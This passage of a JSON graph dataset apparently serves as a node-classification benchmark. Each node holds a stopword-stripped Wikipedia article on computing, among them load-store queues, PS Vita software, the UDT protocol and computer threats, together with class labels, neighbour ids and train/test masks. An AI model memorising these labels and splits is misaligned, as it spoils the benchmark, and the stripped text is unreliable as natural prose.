later loads rather simple fifo queue store queue really content-addressable memory cam searched using memory address load executes searches store queue in-flight stores address logically earlier program order matching store exists load obtains data value store instead memory system matching store load accesses memory system usual preceding matching stores must already retired committed values technique allows loads obtain correct data producer store completed yet retired multiple stores load memory address may present store queue handle case store queue priority encoded select latest store logically earlier load program order determination store latest achieved attaching sort timestamp instructions fetched decoded alternatively knowing relative position slot load respect oldest newest stores within store queue modern out-of-order cpus use number techniques detect raw dependence violation techniques require tracking in-flight loads execution retirement load executes accesses memory system and/or store queue obtain data value address data buffered load queue retirement load queue similar structure function store queue fact processors may combined store queue single structure called load-store queue lsq following techniques used proposed detect raw dependence violations technique load queue like store queue cam searched using memory access address keeps track in-flight loads store executes searches load queue completed loads address logically later program order matching load exists must executed store thus read incorrect old value memory system/store queue instructions used load value also used bad data recover violation detected load marked violated retirement buffer store remains store queue retirement buffer retires normally committing value memory system retires however violated load reaches retirement point processor flushes pipeline restarts execution load instruction point previous stores committed values memory system load instruction read correct value memory system dependent instructions re-execute using correct value technique requires associative search load queue every store execution consumes circuit power prove difficult timing path large load queues however require additional memory cache ports create resource conflicts loads stores executing technique load instructions executed out-of-order re-executed access memory system read value address second time reach retirement point since load retiring instruction dependencies instruction still in-flight stores ahead committed values memory system value read memory system guaranteed correct value read memory re-execution time compared value obtained load first executed values original value correct violation occurred re-execution value differs original value raw violation occurred pipeline must flushed instructions dependent load used incorrect value technique conceptually simpler load queue search eliminates second cam power-hungry search load queue simple fifo queue since load must re-access memory system retirement access must fast scheme relies fast cache matter fast cache however second memory system access every out-of-order load instruction increase instruction retirement latency increases total number cache accesses must performed processor additional retire-time cache access satisfied re-using existing cache port however creates port resource contention loads stores processor trying execute thus may cause decrease performance alternatively additional cache port added load disambiguation increases complexity power area cache recent work roth 2005 shown ways filter many loads re-executing known raw dependence violation could occurred technique would help eliminate latency resource contention minor benefit scheme compared load-queue search flag raw dependence violation trigger pipeline flush store would caused raw dependence violation store address matches in-flight load address data value matches data value already cache load-queue search scheme additional data comparison would need added load-queue search hardware prevent pipeline flush cpus fully support out-of-order execution loads stores must able detect raw dependence violations occur however many cpus avoid problem forcing loads stores execute in-order supporting limited form out-of-order load/store execution approach offers lower performance compared supporting full out-of-order load/store execution significantly reduce complexity execution core caches first option making loads stores go in-order avoids raw dependences possibility load executing producer store obtaining incorrect data another possibility effectively break loads stores two operations address generation cache access two separate linked operations cpu allow loads stores access memory system previous loads stores address generated buffered lsq address generation longer ambiguous dependencies since addresses known dependent loads executed corresponding stores complete scheme still allows out-of-orderness —the address generation operations in-flight loads stores execute out-of-order addresses generated cache accesses load store happen order respects known true dependences processors fully support out-of-order load/store execution use additional related technique called memory dependence prediction attempt predict true dependences loads stores addresses known using technique processor prevent loads predicted dependent in-flight store executing store completes avoiding raw dependence violation thus avoiding pipeline flush performance penalty incurred see memory dependence prediction article details",
    "neighbors": [
      2113,
      7234,
      995,
      10781,
      3431,
      10796,
      6926,
      8143,
      10734,
      9911,
      5948,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 605,
    "label": 9,
    "text": "List_of_program_transformation_systems:list program transformation systems article lists notable program transformation systems alphabetical order",
    "neighbors": [
      2374,
      4519,
      10474,
      11475,
      4980
    ],
    "mask": "None"
  },
  {
    "node_id": 606,
    "label": 3,
    "text": "Digital_Devil_Story:_Megami_Tensei:digital devil story megami tensei digital devil story megami tensei refers two distinct role-playing video games based trilogy science fantasy novels japanese author aya nishitani one version developed atlus published namco 1987 famicom—atlus would go create games megami tensei franchise separate version personal computers co-developed atlus telenet japan published telenet japan year enhanced port super famicom opera house released 1995 story sees japanese high school students akemi nakajima yumiko shirasagi combat forces lucifer unleashed demon summoning program created nakajima gameplay features first-person dungeon crawling turn-based battles negotiation demons famicom version journey hostile labyrinth nakajima featuring real-time combat telenet version development versions video game began following release original video animation adaptation nishitani first digital devil story book early 1987 nishitani deeply involved design scenario gameplay mechanics atlus role-playing version game based wizardry series added demon negotiation system considered revolutionary time atlus telenet japan worked projects simultaneously playing genre expectations respective platforms famicom version proved popular critics gamers spawning sequel titled 1990 famicom version digital devil story megami tensei traditional role-playing video game player takes control party composed two humans number demons party explores large dungeon using first-person perspective human characters use variety weapons items primary weapons swords guns items range healing items different types currency picked enemies found chests scattered dungeon weapons accessories purchased different shops found within dungeon progress saved using password system battles turn-based random encounters taking place exploring dungeons end successful battle experience points money items obtained experience points shared nakajima yumiko gaining enough experience points levels raise given one ability point given one five character attributes strength intelligence attack dexterity luck battles player try persuade enemy demons join exchange magnetite money items player keep seven demons time four summoned time summoned demons aid player battles physical magic attacks cost money summon consume magnetite player walks around demons attitude towards player governed moon phase cycles eight phases new full demons level instead player create stronger demons visiting special location fusing two allied demons together new one version personal computers pc action role-playing game plays top-down perspective controlling nakajima player explores labyrinthine levels dungeon populated enemies combat plays real time nakajima fighting demons using short-range melee attacks ranged magic attacks section dungeon ends powerful boss character plot sees akemi nakajima clever bullied high school student reincarnation deity izanagi develop computer program summons demons makai realm demons initially using program gain revenge tormentors program goes control unleashes horde demons demons commanded lucifer resurrects demonic gods loki set following defeat nakajima yumiko help friend yumiko shirasagi transfer student became interested nakajima reincarnation goddess izanami nakajima takes makai help combat demons pair travel vast subterranean labyrinth defeat lucifer generals—including loki set—before fighting lucifer defeating closing entrance makai digital devil story megami tensei began trilogy science fantasy books written japanese author aya nishitani published tokuma shoten novels major success japan novels first adapted original video animation ova retold events first novel following completion ova 1987 tokuma shoten decided expand series video games license develop game based nishitani work simultaneously acquired two companies atlus telenet japan two companies willing work project wanted differentiate products famicom noted action-based titles pcs traditional role-playing games two companies decided respectively play platform expectations two different game projects created tokuma shoten supervision digital devil story megami tensei title atlus created traditional role-playing game published namco atlus telenet collaborated action role-playing game would published telenet two versions developed concurrently although version telenet first completed atlus version directed kouji okada scenario original elements written kazunari suzuki sprite promotional artwork designed esaki minoru music composed tsukasa masuko early phases gameplay concept near-copy gameplay style wizardry series attributed suzuki superiors fans series suzuki insisted inclusion new feature would distinguish wizardry resulted creation demon negotiation system okada later stated demon negotiation decided upon early stage speaking later first-person exploration okada highly critical feeling efforts left everything said done lots lots long winding dungeons storage space cartridge recurring concern team suzuki using unspecified programming tricks include high-quality sprite graphics due rules gaming industry time teams studios either went uncredited pseudonyms masuko credited project satan storyline game based final novel nishitani trilogy tensei shuuen although taking title first novel megami tensei nishitani deeply involved planning game contributing suggestions advice project according okada major issue development faithfully following novel plot due limited hardware space famicom cartridge together necessity creating compelling gameplay experience mind team picked key parts novel plot include game cutting non-essential elements one element included questionable morality main protagonist prominent feature novels suzuki later commented working namco game ever released due mature character designs heavy use religion narrative cerberus demon would become recurring feature later megami tensei games homage narrative nishitani trilogy time emulating trend games marketable mascot character pc version game published telenet japan pc88 msx x1 fm-7 models july september 1987 pc88 version re-released april 25 2006 kadokawa shoten part collection fifteen games platform famicom version digital devil story megami tensei published namco september 11 1987 version later re-released atlus dedicated mobile store first ntt docomo mobile devices february 26 2004 vodafone live service december 1 year finally brew services september 29 2005 mobile versions direct ports featured graphical improvements automatic mapping dungeons ability save anywhere game game received enhanced port super famicom japanese developer opera house combining game sequel version graphics reworked gameplay adjusted demon artwork redrawn then-established series illustrator kazuma kaneko music arranged hitoshi sakimoto titled kyuuyaku megami tensei port released march 31 1995 version re-released virtual console wii july 3 2012 version game released outside japan attributed nintendo policy censoring religious references games rendered early megami tensei titles unsuitable localization due central religious elements fan translation kyuuyaku megami tensei released august 28 2014 review famitsu compared 3d dungeon exploration atlus version deep dungeon series critics giving praise gameplay unusual setting article game 1991 family computer magazine called revolutionary rpg praising gameplay atmosphere despite design making easy players get lost ohta publishing magazine continue cited dark atmosphere mechanics impressive given limited hardware innovative among role-playing games time kurt kalata christopher j. snelgrove hardcore gaming 101 stated surprising depth monster catching fusing elements given game age praising mechanics despite age high difficult curve contrast praise famicom version referred telenet japan version poor clone gauntlet low-quality graphics specific sales figures available okada said game commercial success allowing atlus breathing room consider next take series mixture demon negotiation recruitment traditional role-playing mechanics considered revolutionary time ugo networks writer k. thor jensen cited game first successful use cyberpunk aesthetics video games saying series mix science fiction elements occult create truly unique fictional cyberpunk world 2012 feature influential games game informer kimberley wallace attributed digital devil story megami tensei pioneering monster collecting gameplay popularized pokémon series 2015 retrospective game 1992 successor shin megami tensei touch arcade shaun musgrave noted unusual game mechanics within standardised role-playing formula science fiction-inspired setting contrast fantasy settings dominating genre time following success game atlus decided create sequel instead continuing adapt nishitani work created original story expanded narrative refined gameplay titled game released famicom 1990 digital devil story megami tensei first game megami tensei series atlus eventually buying rights franchise turning series famous intellectual property megami tensei called third popular rpg series japan dragon quest final fantasy gone include multiple subseries expansions media",
    "neighbors": [
      5762,
      2156,
      9006,
      7922,
      5340
    ],
    "mask": "Train"
  },
  {
    "node_id": 607,
    "label": 2,
    "text": "PlayStation_Vita_system_software:playstation vita system software playstation vita system software official firmware operating system playstation vita playstation tv video game consoles uses livearea graphical shell playstation vita system software one optional add-on component playstation mobile runtime package system built unix-base derived freebsd netbsd livearea name graphical user interface playstation vita system software developed sony computer entertainment interface features new touch-based screen acts like hub page allows users hop different parts game space eighth-generation playstation vita playstation tv consoles use livearea graphical shell instead previous xrossmediabar xmb interface used sony seventh-generation video game consoles playstation portable playstation 3 playstation 4 sony eighth-generation home video game console however uses neither livearea xrossmediabar graphical shell rather utilizes user interface called playstation dynamic menu playstation vita system software uses livearea user interface includes various social networking features via playstation network users select icon game application home screen open livearea screen game application playstation vita playstation tv new feature playstation vita playstation tv livearea latest game information downloadable contents shown livearea screen game addition scrolling game livearea activity users playing game checked instantly playstation vita playstation tv uses system software playstation vita supports feature called remote play sony home video game consoles playstation 3 playstation 4 allows playstation 3 playstation 4 transmit video audio output playstation vita however unlike remote play playstation vita playstation 4 well-integrated remote play playstation vita playstation 3 supported select ps3 titles results often laggy besides playstation vita used second screen device ps4 ps3 supported games class heroes 2g streaming content directly console playstation vita also users playstation vita playstation 3 possible share media files videos music images transferring multimedia files directly playstation vita playstation 3 vice versa updates playstation vita system software also downloaded ps vita devices via ps3 system furthermore service called cross-buy used allows players buy certain games support feature one time play sony platforms minecraft terraria examples games saved worlds transferable consoles minecraft longer cross buy february 25 2016 also feature called cross-play cross-platform play covering playstation vita software title interact playstation 3 playstation 4 software title different software titles use cross-play different ways example ultimate marvel vs. capcom 3 title supporting cross-play feature ps3 version game controlled using ps vita system although playstation vita console function without internet connection provide functionality connected internet example users may download updates system software internet well playing online internet properly connected additionally internet connection playstation vita system allows users access variety playstation network psn services playstation store playstation plus subscription service games content may purchased services applications live playstation app well various video streaming apps also require internet connection function properly browser preinstalled app playstation vita browsing world wide web although different web browsing playstation portable browser improved psp version intended result less difficult experience browser application tabs users 8 separate browser windows open also save images websites ps vita memory card touching holding image menu appears however users use web browser playing game watching video display content limited result recommended exit open game video performing intensive browsing tasks furthermore ps vita web browser supports html5 cookies javascript support adobe flash unlike psp web browser another application preinstalled playstation vita launch maps displayed online maps internet connection available however removed sony via system update along near feature 2015 like many video game consoles playstation vita capable photo audio video playback variety formats built-in cameras used take photos videos however unlike sony home consoles playstation 3 playstation 4 possible play blu-ray dvd movies playstation vita since lacks optical disc drive umd drive playstation portable however users transfer movies supported format playstation vita system videos download playstation store also users transfer content playing displayed playstation vita system playstation tv system allowing view content televisions instead ps vita screens following multimedia formats supported ps vita ps tv system furthermore entertainment applications available download playstation store ps vita ps tv system sony announced gamescom 2011 applications like netflix would become available via playstation store additional applications available download include music unlimited flickr nico nico tunein radio qello crunchyroll crackle hulu plus redbox instant youtube although many compatible ps tv launch similar early playstation 3 consoles compatible playstation 2 titles playstation vita backwards-compatible playstation portable games however playstation vita lacks playstation portable umd drive sony confirmed psp owners would able transfer physical umd games across ps vita system means users able play psp games ps vita originally downloaded via playstation network rather bought disc playing psp game ps vita system ps vita dual analog sticks supported psp games right stick set mimic either d-pad left stick l r buttons face button cluster original psp system graphics psp releases up-scaled optional bilinear filter reduce pixelation besides playstation portable games playstation vita also backwards-compatible majority titles platforms psone classics playstation minis playstation mobile games psone classic titles compatible ps vita launch gradually became available ps vita since system software update 1.80 released august 28 2012 playstation mobile games originally intended compatible playstation vita playstation tv certain devices run android operating system playstation mobile 2.00 released 2014 would target playstation vita optionally playstation tv gaming platforms sony gaming platforms generation gaming platforms seventh generation",
    "neighbors": [
      3077,
      11271,
      10761,
      2061,
      9743,
      3089,
      8725,
      4636,
      3626,
      1067,
      7727,
      1587,
      1080,
      5177,
      9784,
      1083,
      1091,
      3651,
      7748,
      8266,
      6732,
      10316,
      7246,
      7249,
      6738,
      7253,
      3162,
      9306,
      2658,
      9320,
      6763,
      5746,
      9844,
      119,
      633,
      7801,
      8315,
      1148,
      6781,
      8316,
      8829,
      9343,
      11391,
      643,
      6276,
      11398,
      4745,
      6799,
      10393,
      6301,
      7325,
      673,
      2212,
      6311,
      684,
      3248,
      7857,
      1718,
      5819,
      5824,
      11459,
      10436,
      9927,
      8395,
      4305,
      2259,
      10455,
      6361,
      6873,
      8423,
      8937,
      9452,
      3824,
      5369,
      1273,
      4364,
      274,
      5397,
      7965,
      5406,
      4383,
      1316,
      9508,
      10535,
      9512,
      4908,
      1839,
      7983,
      306,
      11573,
      7991,
      7492,
      9543,
      10056,
      9033,
      11079,
      850,
      6486,
      859,
      6491,
      10080,
      7521,
      1891,
      359,
      10599,
      873,
      6508,
      2925,
      7027,
      5492,
      2421,
      7028,
      2424,
      7552,
      5506,
      9091,
      3462,
      1927,
      9625,
      1946,
      5534,
      11698,
      9151,
      9153,
      2001,
      3542,
      10202,
      4060,
      3551,
      998,
      10215,
      3561,
      4073,
      495,
      9201,
      3058,
      1524
    ],
    "mask": "Test"
  },
  {
    "node_id": 608,
    "label": 2,
    "text": "Windows_Hardware_Lab_Kit:windows hardware lab kit windows hardware lab kit windows hlk test automation framework provided microsoft certify devices windows earlier similarly released frameworks called windows hardware certification kit windows hck windows logo kit wlk provides automated scheduling execution driver tests hardware vendors required pass order qualify use microsoft designed windows logo also enables users automate driver tests created tests mixed matched logo tests provided microsoft create custom test pass enables organizations use dtm validate drivers way see fit windows 2000 xp 2003 timeframe old tool hardware compatibility test hct certify devices windows vista released tool replaced driver test manager dtm certify drivers then-supported platforms time dtm part windows driver kit wdk later dtm separated wdk changed name windows logo kit wlk windows 8 name changed windows hardware certification kit windows hck announced //build/ conference subsequently name changed windows hardware lab kit windows hlk windows 10 release intended testing hardware drivers windows 10 platform windows hardware certification kit continues testing hardware windows 7 windows 8 windows 8.1 server products respectively platforms",
    "neighbors": [
      5380,
      6797,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      4384,
      8227,
      11683,
      11559,
      10920,
      4010,
      10157,
      7983,
      9263,
      11570,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      9434,
      603,
      2401,
      8161,
      7523,
      3303,
      4074,
      11498,
      5356,
      3821,
      10991,
      3573,
      3958,
      9205,
      5754,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 609,
    "label": 5,
    "text": "UDP-based_Data_Transfer_Protocol:udp-based data transfer protocol udp-based data transfer protocol udt high-performance data transfer protocol designed transferring large volumetric datasets high-speed wide area networks settings typically disadvantageous common tcp protocol initial versions developed tested high-speed networks 1 gbit/s 10 gbit/s etc however recent versions protocol updated support commodity internet well example protocol supports rendezvous connection setup desirable feature traversing nat firewalls using udp udt open source implementation found sourceforge one popular solutions supporting high-speed data transfer part many research projects commercial products udt developed yunhong gu phd studies national center data mining ncdm university illinois chicago laboratory dr. robert grossman dr. gu continues maintain improve protocol graduation udt project started 2001 inexpensive optical networks became popular triggered wider awareness tcp efficiency problems high-speed wide area networks first version udt also known sabul simple available bandwidth utility library designed support bulk data transfer scientific data movement private networks sabul used udp data transfer separate tcp connection control messages october 2003 ncdm achieved 6.8 gigabits per second transfer chicago united states amsterdam netherlands 30-minute test transmitted approximately 1.4 terabytes data sabul later renamed udt starting version 2.0 released 2004 udt2 removed tcp control connection sabul used udp data control information udt2 also introduced new congestion control algorithm allowed protocol run fairly friendly concurrent udt tcp flows udt3 2006 extended usage protocol commodity internet congestion control tuned support relatively low bandwidth well udt3 also significantly reduced use system resources cpu memory additionally udt3 allows users easily define install congestion control algorithms udt4 2007 introduced several new features better support high concurrency firewall traversing udt4 allowed multiple udt connections bind udp port also supported rendezvous connection setup easier udp hole punching fifth version protocol currently planning stage possible features include ability support multiple independent sessions single connection moreover since absence security feature udt issue initial implementation commercial environment bernardo 2011 developed security architecture udt part phd studies architecture however undergoing enhancement support udt various network environments i.e. optical networks udt built top user datagram protocol udp adding congestion control reliability control mechanisms udt application level connection oriented duplex protocol supports reliable data streaming partial reliable messaging udt uses periodic acknowledgments ack confirm packet delivery negative acks loss reports used report packet loss periodic acks help reduce control traffic reverse path data transfer speed high situations number acks proportional time rather number data packets udt uses aimd additive increase multiplicative decrease style congestion control algorithm increase parameter inversely proportional available bandwidth estimated using packet pair technique thus udt probe high bandwidth rapidly slow better stability approaches maximum bandwidth decrease factor random number 1/8 1/2 helps reduce negative impact loss synchronization udt packet transmission limited rate control window control sending rate updated aimd algorithm described congestion window secondary control mechanism set according data arrival rate receiver side udt implementation exposes set variables related congestion control c++ class allows users define set callback functions manipulate variables thus users redefine control algorithm overriding callback functions tcp control algorithms implemented using feature fewer 100 lines code beside traditional client/server connection setup aka caller/listener listener waits connection potentially accepts multiple connecting callers udt supports also new rendezvous connection setup mode mode sides listen port connect peer simultaneously connect one another therefore parties must use port connection parties role-equivalent contrast listener/caller roles traditional setup rendezvous widely used firewall traversing peers behind firewalls udt widely used high-performance computing support high-speed data transfer optical networks example gridftp popular data transfer tool grid computing udt available data transfer protocol commodity internet udt used many commercial products fast file transfer wide area networks udt purely based udp also used many situations tcp disadvantage udp scenarios include peer-to-peer applications video audio communication many others udt considered state-of-the-art protocol addressing infrastructure requirements transmitting data high-speed networks development however creates new vulnerabilities like many protocols relies solely existing security mechanisms current protocols transmission control protocol tcp udp research conducted dr. danilo valeros bernardo university technology sydney member australian technology network focusing practical experiments udt using proposed security mechanisms exploring use existing security mechanisms used tcp/udp udt gained interesting reviews various network security scientific communities analyze security mechanisms carry formal proof correctness assist determining applicability using protocol composition logic pcl approach modular comprising separate proof protocol section providing insight network environment section reliably employed moreover proof holds variety failure recovery strategies implementation configuration options derive technique pcl tls kerberos literature work developing validating security architecture using rewrite systems automata result work first literature robust theoretical practical representation security architecture udt viable work high-speed network protocols udt project base srt project uses transmission reliability live video streaming public internet udt team prestigious bandwidth challenge three times annual acm/ieee supercomputing conference world premier conference high-performance computing networking storage analysis sc06 tampa fl team transferred astronomy dataset 8 gbit/s disk-to-disk chicago il tampa fl using udt sc08 austin tx team demonstrated use udt complex high-speed data transfer involving various distributed applications 120-node system across four data centers baltimore chicago 2 san diego sc09 portland collaborative team ncdm naval research lab icair showcased udt-powered wide area data intensive cloud computing applications",
    "neighbors": [
      8640,
      3813,
      5,
      1607,
      8905,
      10924,
      11535,
      11413,
      3770,
      9692,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 610,
    "label": 7,
    "text": "Serval_Project:serval project serval project often referred serval project financed shuttleworth foundation well various organisations accepting individual donations headquartered flinders university adelaide australia project aims develop technology used create direct connections cellular phones wi-fi interfaces without need mobile phone operator technology allows live voice calls whenever mesh able find route participants text messages data communicated using store forward system called rhizome allowing communication unlimited distances without stable live mesh connection participants serval project includes collaborate mapping application intended support disaster relief recovery efforts mesh extender developed establishes short range serval mesh wifi joins distant meshes linking mesh extenders packet radio operating ism 915 mhz band serval mesh android application serval project flagship product currently distributed various application distribution platforms repositories also downloaded directly project website application may shared directly one device others nearby wifi bluetooth serval mesh application built two components user interface called batphone core networking encryption file sharing component called serval dna batphone source code licensed public terms gplv3 license whereas serval dna source code licensed terms gplv2 license",
    "neighbors": [
      10021,
      5382,
      11399,
      7983,
      4214,
      5978
    ],
    "mask": "Validation"
  },
  {
    "node_id": 611,
    "label": 4,
    "text": "Bradley_Willman:bradley willman bradley willman born 1980 anti-pedophile activist canada engaged private investigations using internet expose pedophiles one time unfettered access 2,000 3,000 computers used visit websites interest pedophiles result use trojan horse willman actions helped put california superior court judge ronald kline prison two years 2007 possession child pornography however legality willman use trojan horse basis appeal judge willman born 1980 langley british columbia canada willman identifies private computer cop previously used aliases garbie omnipotent late 1990s willman began tracking investigating people downloaded child porn internet time 2000 willman devised trojan horse type computer program used conduct investigations trojan horse posted websites interest pedophiles way appeared picture-file attached message actually program file visitor pedophile website downloaded file visitor unwittingly downloaded trojan horse would typically unaware running computer willman control chose download trojan horse downloaded willman could access search retrieve files infected computer willman stated whole intent program started working expected help kids willman estimated trojan horse gave access 2,000 3,000 computers used visit websites interest pedophiles including police officers military personnel social workers priests judges march 2000 willman helped royal canadian mounted police child molestation case time august 2000 willman anonymously provided private watchdog group documents related kentucky state investigation child molestation production child pornography prior january 2001 united states customs service contacted willman see whether discovered useful information related suspected russian child pornography ring early may 2000 california superior court judge ronald c. kline 1941– downloaded trojan horse computer trojan horse allowed willman b.c. monitor contents kline computer california may 2000 mid-april 2001 willman copied kline computer portions kline diary april 2001 willman anonymously forwarded excerpts diary kline hard drives final entry dated march 18 2001 website pedophile-watchdog pedowatch pedowatch passed diary san bernardino county sheriff office forwarded california attorney general office turn sent city irvine police department november 2001 irvine police searched kline irvine home found 1,500 pornographic computer images young children judge home computer child porn also found kline courthouse computer event drew national attention ultimately led kline drop bid reelection judge largely result efforts talk radio hosts john ken kfi-am 640 kline charged november 2001 united states federal government possession child pornography man said judge molested 14 years old quarter-century earlier came forward california state child molestation charges filed kline well state child molestation charges dismissed july 2003 legal case stogner v. california held california extension statute limitations sex-related child abuse could applied previously time-barred prosecutions united states evidence derives illegal government search generally used court defendant government however evidence derives illegal private search citizen tipster may used court government even though search illegal individual illegal search court answers private/government search question determining whether individual instrument agent government government knew acquiesced intrusive conduct ... party performing search intended assist law enforcement efforts party performing illegal search considered agent government march 17 2003 federal judge ruled willman working government informant invaded judge kline computers willman thought agent law enforcement ii willman motivation invasion act law enforcement purposes since judge ruled violated kline united states 4th amendment right privacy illegal searches government judge suppressed prosecution strongest evidence kline specifically judge suppressed evidence seized kline home home computer including excerpts computer diary sexual desires 1,500 pornographic photos young boys appeal united states court appeals ninth circuit appeals court disagreed federal judge found enough willman act intent assist government needed degree governmental knowledge acquiescence willman actions find willman acting government agent thus appeals court reversed district court order suppressing evidence found fruit willman illegal private search march 2005 united states supreme court declined hear case ended kline appeals 9th circuit united states supreme court actions willman evidence back play december 2005 former orange county superior court judge ronald c. kline pleaded guilty possessing child pornography home computer ending four-year legal battle kline house arrest trial conviction could brought kline 30-year prison term plea agreement limited prison time possible 27 33 months june 2006 state commission judicial performance gave kline serious punishment could give former judge barring receiving work state courts february 2007 kline sentenced 27 months prison possessing child pornography",
    "neighbors": [
      10756
    ],
    "mask": "Validation"
  },
  {
    "node_id": 612,
    "label": 4,
    "text": "Threat_(computer):threat computer computer security threat possible danger might exploit vulnerability breach security therefore cause possible harm threat either intentional i.e hacking individual cracker criminal organization accidental e.g possibility computer malfunctioning possibility natural disaster earthquake fire tornado otherwise circumstance capability action event iso 27005 defines threat comprehensive definition tied information assurance point view found federal information processing standards fips 200 minimum security requirements federal information information systems nist united states america national information assurance glossary defines threat enisa gives similar definition open group defines threat factor analysis information risk defines threat national information assurance training education center gives articulated definition threat term threat relates basic security terms shown following diagram resource physical logical one vulnerabilities exploited threat agent threat action result potentially compromise confidentiality integrity availability properties resources potentially different vulnerable one organization others involved parties customers suppliers so-called cia triad basis information security attack active attempts alter system resources affect operation compromises integrity availability passive attack attempts learn make use information system affect system resources compromises confidentiality owasp see figure depicts phenomenon slightly different terms threat agent attack vector exploits weakness vulnerability system related security controls causing technical impact resource asset connected business impact set policies concerned information security management information security management systems isms developed manage according risk management principles countermeasures order accomplish security strategy set following rules regulations applicable country countermeasures also called security controls applied transmission information named security services overall picture represents risk factors risk scenario widespread computer dependencies consequent raising consequence successful attack led new term cyberwarfare nowadays many real attacks exploit psychology least much technology phishing pretexting methods called social engineering techniques web 2.0 applications specifically social network services mean get touch people charge system administration even system security inducing reveal sensitive information one famous case robin sage widespread documentation computer insecurity technical threats computer virus trojan malware serious study apply cost effective countermeasures conducted following rigorous risk analysis framework isms pure technical approach let psychological attacks increasing threats threats classified according type origin note threat type multiple origins people interested studying possible threats microsoft proposed threat classification called stride initials threat categories microsoft previously rated risk security threats using five categories classification called model considered obsolete microsoft categories dread name comes initials five categories listed spread network threats lead dangerous situations military civil fields threat level defined example infocon threat level used us leading antivirus software vendors publish global threat level websites term threat agent used indicate individual group manifest threat fundamental identify would want exploit assets company might use company individuals within threat population practically anyone anything right circumstances threat agent – well-intentioned inept computer operator trashes daily batch job typing wrong command regulator performing audit squirrel chews data cable threat agents take one following actions asset important recognize actions affects different assets differently drives degree nature loss example potential productivity loss resulting destroyed stolen asset depends upon critical asset organization productivity critical asset simply illicitly accessed direct productivity loss similarly destruction highly sensitive asset play critical role productivity would directly result significant productivity loss yet asset disclosed result significant loss competitive advantage reputation generate legal costs point combination asset type action asset determines fundamental nature degree loss action threat agent takes driven primarily agent motive e.g. financial gain revenge recreation etc nature asset example threat agent bent financial gain less likely destroy critical server steal easily pawned asset like laptop important separate concept event threat agent get contact asset even virtually i.e network event threat agent act asset owasp collects list potential threat agents prevent system designers programmers insert vulnerabilities software threat agent capabilities intentions past activities individuals groups classified follows threat sources wish compromise occur term used distinguish threat agents/actors carry attack may commissioned persuaded threat source knowingly unknowingly carry attack threat action assault system security complete security architecture deals intentional acts i.e attacks accidental events various kinds threat actions defined subentries threat consequence threat analysis analysis probability occurrences consequences damaging actions system basis risk analysis threat consequence security violation results threat action includes disclosure deception disruption usurpation following subentries describe four kinds threat consequences also list describe kinds threat actions cause consequence threat actions accidental events marked collection threats particular domain context information identified vulnerable assets threats risks threat actors observed trends threats managed operating isms performing risk management activities foreseen laws standards methodologies large organizations tend adopt business continuity management plans order protect maintain recover business-critical processes systems plans foreseen set computer security incident response team csirt computer emergency response team cert kind verification threat management process organizations perform subset steps adopting countermeasures based non systematic approach computer insecurity studies battlefield computer security exploits defences results information security awareness significant market see lot software developed deal threats including open-source software see proprietary software see partial list threat management involves wide variety threats including physical threats like flood fire isms risk assessment process incorporate threat management cyber threats remote buffer overflows risk assessment process n't include processes threat intelligence management response procedures cyber threat management ctm emerging best practice managing cyber threats beyond basic risk assessment found isms enables early identification threats data-driven situational awareness accurate decision-making timely threat mitigating actions ctm includes cyber threat hunting process proactively iteratively searching networks detect isolate advanced threats evade existing security solutions contrast traditional threat management measures firewalls intrusion detection systems siems typically involve investigation warning potential threat incident occurred threat hunting manual process security analyst sifts various data information using knowledge familiarity network create hypotheses potential threats even effective efficient however threat hunting partially automated machine-assisted well case analyst utilizes software harnesses machine learning user entity behaviour analytics ueba inform analyst potential risks analyst investigates potential risks tracking suspicious behaviour network thus hunting iterative process meaning must continuously carried loop beginning hypothesis three types hypotheses analyst researches hypothesis going vast amounts data network results stored used improve automated portion detection system serve foundation future hypotheses sans institute conducted research surveys effectiveness threat hunting track disrupt cyber adversaries early process possible according survey released 2016 adopters model reported positive results 74 percent citing reduced attack surfaces 59 percent experiencing faster speed accuracy responses 52 percent finding previously undetected threats networks",
    "neighbors": [
      5636,
      10756,
      1567,
      2090,
      6707,
      7739,
      7228,
      1088,
      4163,
      9293,
      4689,
      5722,
      1640,
      5226,
      119,
      5245,
      11401,
      5774,
      4755,
      5780,
      7322,
      1179,
      10915,
      2213,
      2733,
      8881,
      6323,
      10437,
      5325,
      1245,
      4348,
      5373,
      1803,
      7436,
      8975,
      278,
      7454,
      8998,
      3880,
      7464,
      7979,
      10539,
      11567,
      10034,
      1344,
      11594,
      4948,
      1369,
      11609,
      7515,
      11611,
      1886,
      9058,
      3944,
      2409,
      3433,
      10092,
      4471,
      4487,
      2953,
      4494,
      3473,
      1941,
      1440,
      7075,
      1453,
      8637,
      10173,
      1479,
      10190,
      9688,
      3552,
      483,
      7652,
      1509,
      999,
      4081,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 613,
    "label": 3,
    "text": "LGA_3647:lga 3647 lga 3647 intel microprocessor compatible socket used xeon phi x200 knights landing xeon phi 72x5 knights mill skylake-ex -sp xeon purley microprocessors socket supports 6-channel memory controller non-volatile 3d xpoint memory dimms intel ultra path interconnect upi replacement qpi 100g omni-path interconnect",
    "neighbors": [
      3588,
      9095,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      1000,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 614,
    "label": 5,
